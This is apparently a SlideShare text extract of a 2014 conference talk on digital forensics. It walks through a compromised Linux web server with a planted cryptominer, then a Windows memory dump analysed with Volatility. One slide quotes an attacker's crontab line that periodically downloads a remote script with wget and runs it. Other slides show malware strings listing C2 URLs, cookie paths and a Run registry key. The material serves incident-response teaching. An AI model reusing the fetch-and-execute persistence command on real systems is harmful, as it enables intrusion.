SlideShare a Scribd company logo

Adventures in Digital Forensics

_
_xhr_

My talk about post-mortem and volatily memory forensics from the EasterHegg 2014.

Technology
1 of 52
Download to read offline
Adventures in Digital Forensics xhr xhr giessen.ccc.de
xhr Easterhegg 2014 2 $ whoami
xhr Easterhegg 2014 3 What is Digital Forensics?
xhr Easterhegg 2014 4 What the media thinks...
xhr Easterhegg 2014 5 + Flickr. West Midlands Police. CC-BY-2.0
xhr Easterhegg 2014 6 What it is really about ...
xhr Easterhegg 2014 7 Flickr. Naughty Architect. CC-BY-2.0
xhr Easterhegg 2014 8 Srsly? Crawling a Shitload of Data * Hey, that's cool. It's Big Data[TM] !!1 *
xhr Easterhegg 2014 9 Discover unknown malware * sadly, known as well :/ *
xhr Easterhegg 2014 11 Learn new Things[TM]
xhr Easterhegg 2014 12 Two Approaches
xhr Easterhegg 2014 13 Disc Forensics
xhr Easterhegg 2014 14 Memory Forensics
xhr Easterhegg 2014 15 Post-mortem Analysis
xhr Easterhegg 2014 16 MAC Time Analysis
xhr Easterhegg 2014 17 Tim e stam pM AC User Perm issions Path Size Time Last Modified Last Accessed Last Changed Birth time
xhr Easterhegg 2014 18 [...] m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkblocks" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.tar" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.ew3" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.bbb" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/apache2" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkfs" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkswap" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/e.tar.xz" ..c.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/tar" .a..,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" ma..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/cpuminer­quark.zip" .a..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/include/zconf.h" .a..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/include/zlib.h" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/­log/bin/external­ip" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/­log/bin/upnpc" .a..,­rw­r—r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/lib/libminiupnpc.a" [...]
xhr Easterhegg 2014 19 [...] m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkblocks" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.tar" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.ew3" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.bbb" m...,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/apache2" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkfs" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/checkswap" m...,­rw­r­­r­­,www­data,www­data,0,"/var/tmp/e.tar.xz" ..c.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/tar" .a..,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/ew3" ma..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/cpuminer­quark.zip" .a..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/include/zconf.h" .a..,­rw­r­­r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/include/zlib.h" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/­log/bin/external­ip" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/­log/bin/upnpc" .a..,­rw­r—r­­,www­data,www­data,0,"/tmp/.ICE­unix/­log/lib/libminiupnpc.a" [...]
xhr Easterhegg 2014 20 [...] .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.bbb" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.ew3" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.tar" m.c.,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/cw" m...,­rwsr­sr­x,www­data,www­data,0,"/tmp/.ICE­unix/sid" mac.,­rw­r­­r­­,www­data,www­data,0,"/tmp/.a" ..c.,­rw­­­­­­­,www­data,www­data,0,"/var/www/.ssh/authorized_keys" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/cw" ..c.,­rwsr­sr­x,www­data,www­data,0,"/tmp/.ICE­unix/sid" ..c.,drwx­­­­­­,www­data,www­data,0,"/var/www/.ssh" .a..,drwx­­­­­­,www­data,www­data,0,"/var/www/.ssh" .a..,­rw­r­­r­­,www­data,root,0,"/home/cron/www­data.tab" m.c.,­rw­­­­­­­,www­data,ssh,0,"/var/spool/cron/crontabs/www­data" .a..,­rw­­­­­­­,www­data,ssh,0,"/var/spool/cron/crontabs/www­data" [...]
xhr Easterhegg 2014 21 [...] .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.bbb" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.ew3" .ac.,­rwxr­xr­x,www­data,www­data,0,"/var/tmp/.tar" m.c.,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/cw" m...,­rwsr­sr­x,www­data,www­data,0,"/tmp/.ICE­unix/sid" mac.,­rw­r­­r­­,www­data,www­data,0,"/tmp/.a" ..c.,­rw­­­­­­­,www­data,www­data,0,"/var/www/.ssh/authorized_keys" .a..,­rwxr­xr­x,www­data,www­data,0,"/tmp/.ICE­unix/cw" ..c.,­rwsr­sr­x,www­data,www­data,0,"/tmp/.ICE­unix/sid" ..c.,drwx­­­­­­,www­data,www­data,0,"/var/www/.ssh" .a..,drwx­­­­­­,www­data,www­data,0,"/var/www/.ssh" .a..,­rw­r­­r­­,www­data,root,0,"/home/cron/www­data.tab" m.c.,­rw­­­­­­­,www­data,ssh,0,"/var/spool/cron/crontabs/www­data" .a..,­rw­­­­­­­,www­data,ssh,0,"/var/spool/cron/crontabs/www­data" [...]
xhr Easterhegg 2014 22 On-disk Analysis
xhr Easterhegg 2014 23 host:/tmp/.ICE­unix/­log# ls ­l total 5088 ­rw­r­­r­­  1 www­data www­data     238 Dec 17 16:26   drwxr­xr­x  2 www­data www­data    4096 Dec 15 04:01 bin ­rw­r­­r­­  1 www­data www­data  526652 Aug 20 22:05 cpuminer­quark.zip ­rw­r­­r­­  1 www­data www­data  526652 Aug 20 22:05 cpuminer­quark.zip.1 ­rw­r­­r­­  1 www­data www­data  526652 Aug 20 22:05 cpuminer­quark.zip.2 ­rw­r­­r­­  1 www­data www­data  526652 Aug 20 22:05 cpuminer­quark.zip.3 drwxr­xr­x  3 www­data www­data      22 Dec 14 12:41 doc drwxr­xr­x  5 www­data www­data     126 Dec 15 04:01 include drwxr­xr­x  4 www­data www­data    4096 Dec 17 16:26 lib drwxr­xr­x  3 www­data www­data      17 Dec 14 12:41 man ­rwxr­xr­x  1 www­data www­data       0 Dec 14 03:24 rsyslogd ­rw­r­­r­­  1 www­data www­data 3077358 Dec 16 16:53 sshc.tgz drwxr­xr­x  6 www­data www­data      71 Dec 15 03:53 ssl
xhr Easterhegg 2014 24 Crontab FTW! @weekly wget ­q hxxp://221.132.37.XX/scen  ­O /tmp/sh; sh /tmp/sh; rm ­rd /tmp/sh
xhr Easterhegg 2014 25 Log Files
xhr Easterhegg 2014 26 [error] [client X] ­­20XX­XX­XX 03:09:34­­  hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XX­XX­XX 03:09:34 (208 KB/s) ­ `d1e.txt'  saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time  Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 ­­:­­:­­  0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 ­­:­­:­­  ­­:­­:­­ ­­:­­:­­ 141k [error] [client X] sh: lwp­download: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [­s sigspec | ­n signum |  ­sigspec] pid | jobspec ... or kill ­l [sigspec]
xhr Easterhegg 2014 27 [error] [client X] ­­20XX­XX­XX 03:09:34­­  hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XX­XX­XX 03:09:34 (208 KB/s) ­ `d1e.txt'  saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time  Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 ­­:­­:­­  0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 ­­:­­:­­  ­­:­­:­­ ­­:­­:­­ 141k [error] [client X] sh: lwp­download: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [­s sigspec | ­n signum |  ­sigspec] pid | jobspec ... or kill ­l [sigspec]
xhr Easterhegg 2014 28 [error] [client X] ­­20XX­XX­XX 03:09:34­­  hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XX­XX­XX 03:09:34 (208 KB/s) ­ `d1e.txt'  saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time  Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 ­­:­­:­­  0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 ­­:­­:­­  ­­:­­:­­ ­­:­­:­­ 141k [error] [client X] sh: lwp­download: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [­s sigspec | ­n signum |  ­sigspec] pid | jobspec ... or kill ­l [sigspec]
xhr Easterhegg 2014 29 [error] [client X] ­­20XX­XX­XX 03:09:34­­  hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XX­XX­XX 03:09:34 (208 KB/s) ­ `d1e.txt'  saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time  Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 ­­:­­:­­  0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 ­­:­­:­­  ­­:­­:­­ ­­:­­:­­ 141k [error] [client X] sh: lwp­download: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [­s sigspec | ­n signum |  ­sigspec] pid | jobspec ... or kill ­l [sigspec]
xhr Easterhegg 2014 30 Write Remote Logs!!1
xhr Easterhegg 2014 31 And use Smart Indexing loghost:/syslog/live $ du -hs 4.5T . :)
xhr Easterhegg 2014 32 Memory Forensics 101
xhr Easterhegg 2014 33 Mem dump == IDDQD
xhr Easterhegg 2014 34 Linux → Windows
xhr Easterhegg 2014 35 Details about the Victim Determining profile based on KDBG search...           Suggested Profile(s) : WinXPSP2x86,  WinXPSP3x86 (Instantiated with WinXPSP2x86)                       PAE type : PAE                            DTB : 0x28a000L                           KDBG : 0x80545ce0           Number of Processors : 1      Image Type (Service Pack) : 3 $ file ram.elf  ram.elf: ELF 64­bit LSB core file x86­64,  version 1 (SYSV) $ ls ­l ram.elf  293M ­rw­­­­­­­ 1 xhr xhr 293M Apr 19 15:29  ram.elf
xhr Easterhegg 2014 36 Check Networking
xhr Easterhegg 2014 37 Offset(P)  Local Address             Remote Address            Pid ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­ 0x017af800 10.0.2.15:2859            4.26.224.125:80           360 0x017c3008 10.0.2.15:2841            4.26.224.125:80           360 0x017c3270 10.0.2.15:2845            68.232.35.169:80          360 0x017c42c0 10.0.2.15:2771            31.13.64.145:443          360 0x017c45d0 10.0.2.15:2770            23.37.37.163:80           360 0x017d2aa8 10.0.2.15:2857            4.26.224.125:80           360 0x017d75c0 10.0.2.15:2846            162.159.243.176:80        360 0x017d79e8 10.0.2.15:2773            2.18.162.110:443          360 0x017d7cf8 10.0.2.15:2772            95.100.249.129:80         360 0x017d8d28 10.0.2.15:2858            4.26.224.125:80           360 0x017db9e8 10.0.2.15:2778            131.253.37.30:80          360 0x017dbcf8 10.0.2.15:2867            8.21.198.146:80           360 0x017ddbe8 10.0.2.15:2769            23.37.37.163:80           360 0x017de6e8 10.0.2.15:2761            91.103.137.3:80           360 0x01803968 10.0.2.15:2754            23.43.118.238:80          360 0x01803e68 10.0.2.15:2757            173.194.69.139:80        3460 0x0195e458 10.0.2.15:2854            31.192.116.24:80          360
xhr Easterhegg 2014 38 Offset(P)  Local Address             Remote Address            Pid ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­ 0x017af800 10.0.2.15:2859            4.26.224.125:80           360 0x017c3008 10.0.2.15:2841            4.26.224.125:80           360 0x017c3270 10.0.2.15:2845            68.232.35.169:80          360 0x017c42c0 10.0.2.15:2771            31.13.64.145:443          360 0x017c45d0 10.0.2.15:2770            23.37.37.163:80           360 0x017d2aa8 10.0.2.15:2857            4.26.224.125:80           360 0x017d75c0 10.0.2.15:2846            162.159.243.176:80        360 0x017d79e8 10.0.2.15:2773            2.18.162.110:443          360 0x017d7cf8 10.0.2.15:2772            95.100.249.129:80         360 0x017d8d28 10.0.2.15:2858            4.26.224.125:80           360 0x017db9e8 10.0.2.15:2778            131.253.37.30:80          360 0x017dbcf8 10.0.2.15:2867            8.21.198.146:80           360 0x017ddbe8 10.0.2.15:2769            23.37.37.163:80           360 0x017de6e8 10.0.2.15:2761            91.103.137.3:80           360 0x01803968 10.0.2.15:2754            23.43.118.238:80          360 0x01803e68 10.0.2.15:2757            173.194.69.139:80        3460 0x0195e458 10.0.2.15:2854            31.192.116.24:80          360
xhr Easterhegg 2014 39 Check IE History
xhr Easterhegg 2014 40 admin@about:Home admin@http://127.0.0.1:1088/app/index.html admin@http://ccc.de admin@http://ccc.de/de/rss/updates.rdf admin@http://ccc.de/de/rss/updates.xml admin@http://de.msn.com/?rd=1&ucc=DE&dcc=DE&opt=0 admin@http://edpn.ebay.com/engagement?INIT=575302488402|22076974|707189966101462|1|0| 1||http://de.msn.com/?rd=1&ucc=DE&dcc=DE&opt=0 admin@http://go.microsoft.com/fwlink/?LinkID=121792 admin@http://home.microsoft.com admin@https://download­installer.cdn.mozilla.net/pub/firefox/releases/26.0/win32/en­ US/Firefox%20Setup%20Stub%2026.0.exe admin@http://update.microsoft.com/favicon.ico admin@http://update.microsoft.com/microsoftupdate/v6/default.aspx admin@http://update.microsoft.com/microsoftupdate/v6/default.aspx?ln=en­us admin@http://update.microsoft.com/microsoftupdate/v6/resultslist.aspx?ln=en­us&id=6 admin@http://windowsupdate.microsoft.com/favicon.ico admin@http://windowsupdate.microsoft.com/windowsupdate/v6/default.aspx admin@http://windowsupdate.microsoft.com/windowsupdate/v6/default.aspx?ln=en­us admin@http://windowsupdate.microsoft.com/windowsupdate/v6/resultslist.aspx?ln=en­ us&id=6 admin@http://windowsupdate.microsoft.com/windowsupdate/v6/splash.aspx?ln=en­us&page=8 admin@http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome admin@http://www.mozilla.org/en­US admin@http://www.mozilla.org/en­US/products/download.html?product=firefox­ stub&os=win&lang=en­US admin@http://www.msn.com admin@http://www.youporn.com/rss admin@res://ief admin@res://ieframe.dll/tabswelcome.htm
xhr Easterhegg 2014 42 Any Malicious Processes?
xhr Easterhegg 2014 43 Offset(V)  Name                    PID   PPID   Thds     Hnds  ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­­­  0x819cca00 System                    4      0     53      359  0x81843930 SMSS.EXE                324      4      3       19  0x8170dda0 CSRSS.EXE               608    324      9      433  0x8171c1c8 WINLOGON.EXE            632    324     17      504  0x8170ba98 SERVICES.EXE            676    632     15      258  0x81706a98 LSASS.EXE               688    632     24      369  0x8196e560 VBOXSERVICE.EXE         840    676      8      105  0x81793da0 SVCHOST.EXE             884    676     18      201  0x8170db20 SVCHOST.EXE             972    676      9      248  0x81823990 SVCHOST.EXE            1092    676     77     1492  0x81745c18 SVCHOST.EXE            1140    676      6       84  0x81703560 SVCHOST.EXE            1176    676     12      172  0x817d8730 EXPLORER.EXE           1548   1496     21      672  0x8183caf0 SPOOLSV.EXE            1664    676     10      117  0x81738da0 VBOXTRAY.EXE           1860   1548     10      936  0x81724470 CTFMON.EXE             1872   1548      4       94  0x816f0650 SVCHOST.EXE             584    676      4      105  0x817f4da0 ALG.EXE                 460    676      6      106  0x819215d0 firefox.exe            3460   1548     36      462  0x817313c0 IEXPLORE.EXE           4008   1548     16      412  0x81706228 IEXPLORE.EXE            360   4008     29      994  0x81870888 UPS_COLLECT_LET        1156   1548      4       34 
xhr Easterhegg 2014 44 Offset(V)  Name                    PID   PPID   Thds     Hnds  ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­­­  0x819cca00 System                    4      0     53      359  0x81843930 SMSS.EXE                324      4      3       19  0x8170dda0 CSRSS.EXE               608    324      9      433  0x8171c1c8 WINLOGON.EXE            632    324     17      504  0x8170ba98 SERVICES.EXE            676    632     15      258  0x81706a98 LSASS.EXE               688    632     24      369  0x8196e560 VBOXSERVICE.EXE         840    676      8      105  0x81793da0 SVCHOST.EXE             884    676     18      201  0x8170db20 SVCHOST.EXE             972    676      9      248  0x81823990 SVCHOST.EXE            1092    676     77     1492  0x81745c18 SVCHOST.EXE            1140    676      6       84  0x81703560 SVCHOST.EXE            1176    676     12      172  0x817d8730 EXPLORER.EXE           1548   1496     21      672  0x8183caf0 SPOOLSV.EXE            1664    676     10      117  0x81738da0 VBOXTRAY.EXE           1860   1548     10      936  0x81724470 CTFMON.EXE             1872   1548      4       94  0x816f0650 SVCHOST.EXE             584    676      4      105  0x817f4da0 ALG.EXE                 460    676      6      106  0x819215d0 firefox.exe            3460   1548     36      462  0x817313c0 IEXPLORE.EXE           4008   1548     16      412  0x81706228 IEXPLORE.EXE            360   4008     29      994  0x81870888 UPS_COLLECT_LET        1156   1548      4       34 
xhr Easterhegg 2014 45 Offset(V)  Name                    PID   PPID   Thds     Hnds  ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­­­  0x819cca00 System                    4      0     53      359  0x81843930 SMSS.EXE                324      4      3       19  0x8170dda0 CSRSS.EXE               608    324     10      435  0x8171c1c8 WINLOGON.EXE            632    324     17      504  0x8170ba98 SERVICES.EXE            676    632     15      258  0x81706a98 LSASS.EXE               688    632     24      369  0x8196e560 VBOXSERVICE.EXE         840    676      8      105  0x81793da0 SVCHOST.EXE             884    676     18      201  0x8170db20 SVCHOST.EXE             972    676      9      248  0x81823990 SVCHOST.EXE            1092    676     77     1492  0x81745c18 SVCHOST.EXE            1140    676      6       84  0x81703560 SVCHOST.EXE            1176    676     12      172  0x817d8730 EXPLORER.EXE           1548   1496     21      672  0x8183caf0 SPOOLSV.EXE            1664    676     10      117  0x81738da0 VBOXTRAY.EXE           1860   1548     10      939  0x81724470 CTFMON.EXE             1872   1548      4       94  0x816f0650 SVCHOST.EXE             584    676      4      105  0x817f4da0 ALG.EXE                 460    676      6      106  0x819215d0 firefox.exe            3460   1548     36      462  0x817313c0 IEXPLORE.EXE           4008   1548     16      412  0x81706228 IEXPLORE.EXE            360   4008     29      994  0x81887620 KB01065453.exe         3564   1156      1       15 
xhr Easterhegg 2014 46 Process Dump
xhr Easterhegg 2014 47
xhr Easterhegg 2014 48 Putting it into IDA Pro * Having a Pro license totally rocks :) *
xhr Easterhegg 2014 49 Detailz kthxbye! 000000011410   000000411410      0   http://113.130.65.77:8080/mx5/C/in/ 000000011458   000000411458      0   http://199.71.212.78:8080/mx5/C/in/ 0000000114A0   0000004114A0      0   http://211.191.168.98:8080/mx5/C/in/ 0000000114F0   0000004114F0      0   http://195.250.139.10:8080/mx5/C/in/ 000000011540   000000411540      0   http://173.224.208.60:8080/mx5/C/in/ 000000011590   000000411590      0   http://46.51.218.71:8080/mx5/C/in/ 0000000115D8   0000004115D8      0   http://89.97.55.33:8080/mx5/C/in/ 000000011620   000000411620      0   http://71.89.140.153:8080/mx5/C/in/ 000000011668   000000411668      0   http://195.111.72.46:8080/mx5/C/in/ 0000000116B0   0000004116B0      0   http://84.53.217.109:8080/mx5/C/in/ 0000000116F8   0000004116F8      0   http://78.46.64.17:8080/mx5/C/in/ 0000000111F8   0000004111F8      0   SoftwareMicrosoftWindows NTC%08X 000000011254   000000411254      0   MozillaFirefoxProfiles 000000011288   000000411288      0   cookies.* 00000001129C   00000041129C      0   Macromedia 0000000112BC   0000004112BC      0   firefox.exe 0000000112D4   0000004112D4      0   explorer.exe 000000011C60   000000411C60      0   SoftwareMicrosoftWindows NTS%08X 000000011CEB   000000411CEB      0   sKB%08d.exe 000000011D08   000000411D08      0   SoftwareMicrosoftWindowsCurrentVersionRun
xhr Easterhegg 2014 50 Selected Tools
xhr Easterhegg 2014 51 The Sleuth Kit http://www.sleuthkit.org
xhr Easterhegg 2014 52 The Volatility Framework https://code.google.com/p/volatility/
xhr Easterhegg 2014 53 Fin!
xhr Easterhegg 2014 54 Q & A xhr xhr giessen.ccc.de @ @_xhr_

Recommended

LISA Qooxdoo Tutorial Handouts
LISA Qooxdoo Tutorial HandoutsLISA Qooxdoo Tutorial Handouts
LISA Qooxdoo Tutorial Handouts
Tobias Oetiker
 
SCWCD : Handling exceptions : CHAP : 5
SCWCD : Handling exceptions : CHAP : 5SCWCD : Handling exceptions : CHAP : 5
SCWCD : Handling exceptions : CHAP : 5
Ben Abdallah Helmi
 
Fabio Ghioni
Fabio GhioniFabio Ghioni
Fabio Ghioni
Fabio Ghioni
 
Configuring Greenstone's OAI server
Configuring Greenstone's OAI serverConfiguring Greenstone's OAI server
Configuring Greenstone's OAI server
Diego Spano
 
User Profiles: I Didn't Know I Could Do That (Updated Demo)
User Profiles: I Didn't Know I Could Do That (Updated Demo)User Profiles: I Didn't Know I Could Do That (Updated Demo)
User Profiles: I Didn't Know I Could Do That (Updated Demo)
Stacy Deere
 
Hibernate reference pt-br
Hibernate reference pt-brHibernate reference pt-br
Hibernate reference pt-br
Leonardo Brancalhão
 
Collaboration with Eclipse final
Collaboration with Eclipse finalCollaboration with Eclipse final
Collaboration with Eclipse final
Kenu, GwangNam Heo
 
ORCID ED Report 10292013
ORCID ED Report 10292013ORCID ED Report 10292013
ORCID ED Report 10292013
ORCID, Inc
 

Recommended

LISA Qooxdoo Tutorial Handouts
LISA Qooxdoo Tutorial HandoutsLISA Qooxdoo Tutorial Handouts
LISA Qooxdoo Tutorial Handouts
Tobias Oetiker
 
SCWCD : Handling exceptions : CHAP : 5
SCWCD : Handling exceptions : CHAP : 5SCWCD : Handling exceptions : CHAP : 5
SCWCD : Handling exceptions : CHAP : 5
Ben Abdallah Helmi
 
Fabio Ghioni
Fabio GhioniFabio Ghioni
Fabio Ghioni
Fabio Ghioni
 
Configuring Greenstone's OAI server
Configuring Greenstone's OAI serverConfiguring Greenstone's OAI server
Configuring Greenstone's OAI server
Diego Spano
 
User Profiles: I Didn't Know I Could Do That (Updated Demo)
User Profiles: I Didn't Know I Could Do That (Updated Demo)User Profiles: I Didn't Know I Could Do That (Updated Demo)
User Profiles: I Didn't Know I Could Do That (Updated Demo)
Stacy Deere
 
Hibernate reference pt-br
Hibernate reference pt-brHibernate reference pt-br
Hibernate reference pt-br
Leonardo Brancalhão
 
Collaboration with Eclipse final
Collaboration with Eclipse finalCollaboration with Eclipse final
Collaboration with Eclipse final
Kenu, GwangNam Heo
 
ORCID ED Report 10292013
ORCID ED Report 10292013ORCID ED Report 10292013
ORCID ED Report 10292013
ORCID, Inc
 
What's Next with Government Big Data
What's Next with Government Big Data What's Next with Government Big Data
What's Next with Government Big Data
GovLoop
 
Lacerte Helpful Resources
Lacerte Helpful ResourcesLacerte Helpful Resources
Lacerte Helpful Resources
intuitaccts
 
Web service overview
Web service overviewWeb service overview
Web service overview
Saran Yuwanna
 
缓存技术浅谈
缓存技术浅谈缓存技术浅谈
缓存技术浅谈
Robbin Fan
 
AVG Community Powered Threat Report: Q1 2012
AVG Community Powered Threat Report: Q1 2012AVG Community Powered Threat Report: Q1 2012
AVG Community Powered Threat Report: Q1 2012
AVG Technologies AU
 
Social Networking
Social NetworkingSocial Networking
Social Networking
Caroline Cerveny
 
Montando seu DataCenter Pessoal - Fernando Massen
Montando seu DataCenter Pessoal - Fernando MassenMontando seu DataCenter Pessoal - Fernando Massen
Montando seu DataCenter Pessoal - Fernando Massen
Tchelinux
 
Caderno SISP 2012
Caderno SISP 2012Caderno SISP 2012
Caderno SISP 2012
GovBR
 
Especial Linux Magazine Software Público
Especial Linux Magazine Software PúblicoEspecial Linux Magazine Software Público
Especial Linux Magazine Software Público
GovBR
 
SCWCD : The servlet model CHAP : 2
SCWCD : The servlet model CHAP : 2SCWCD : The servlet model CHAP : 2
SCWCD : The servlet model CHAP : 2
Ben Abdallah Helmi
 
Tomcat Maven Plugin
Tomcat Maven PluginTomcat Maven Plugin
Tomcat Maven Plugin
Olivier Lamy
 
Nosotros Elmedio
Nosotros ElmedioNosotros Elmedio
Nosotros Elmedio
Espacio Público
 
Mision y vision .pdf ss
Mision y vision .pdf ssMision y vision .pdf ss
Mision y vision .pdf ss
Ronnyonam
 
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...
Quinnipiac University
 
State of virtualisation -- 2012
State of virtualisation -- 2012State of virtualisation -- 2012
State of virtualisation -- 2012
Jonathan Sinclair
 
El papel del vídeo en la Web 2.0
El papel del vídeo en la Web 2.0El papel del vídeo en la Web 2.0
El papel del vídeo en la Web 2.0
Pablo Olmeda
 
Django - the first five years
Django - the first five yearsDjango - the first five years
Django - the first five years
Jacob Kaplan-Moss
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
Remote DBA Services
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
The Digital Insurer
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
Zilliz
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
Khushali Kathiriya
 

More Related Content

Viewers also liked

Lacerte Helpful Resources
Lacerte Helpful ResourcesLacerte Helpful Resources
Lacerte Helpful Resources
intuitaccts
 
AVG Community Powered Threat Report: Q1 2012
AVG Community Powered Threat Report: Q1 2012AVG Community Powered Threat Report: Q1 2012
AVG Community Powered Threat Report: Q1 2012
AVG Technologies AU
 
Montando seu DataCenter Pessoal - Fernando Massen
Montando seu DataCenter Pessoal - Fernando MassenMontando seu DataCenter Pessoal - Fernando Massen
Montando seu DataCenter Pessoal - Fernando Massen
Tchelinux
 
Caderno SISP 2012
Caderno SISP 2012Caderno SISP 2012
Caderno SISP 2012
GovBR
 
Especial Linux Magazine Software Público
Especial Linux Magazine Software PúblicoEspecial Linux Magazine Software Público
Especial Linux Magazine Software Público
GovBR
 
SCWCD : The servlet model CHAP : 2
SCWCD : The servlet model CHAP : 2SCWCD : The servlet model CHAP : 2
SCWCD : The servlet model CHAP : 2
Ben Abdallah Helmi
 
Mision y vision .pdf ss
Mision y vision .pdf ssMision y vision .pdf ss
Mision y vision .pdf ss
Ronnyonam
 
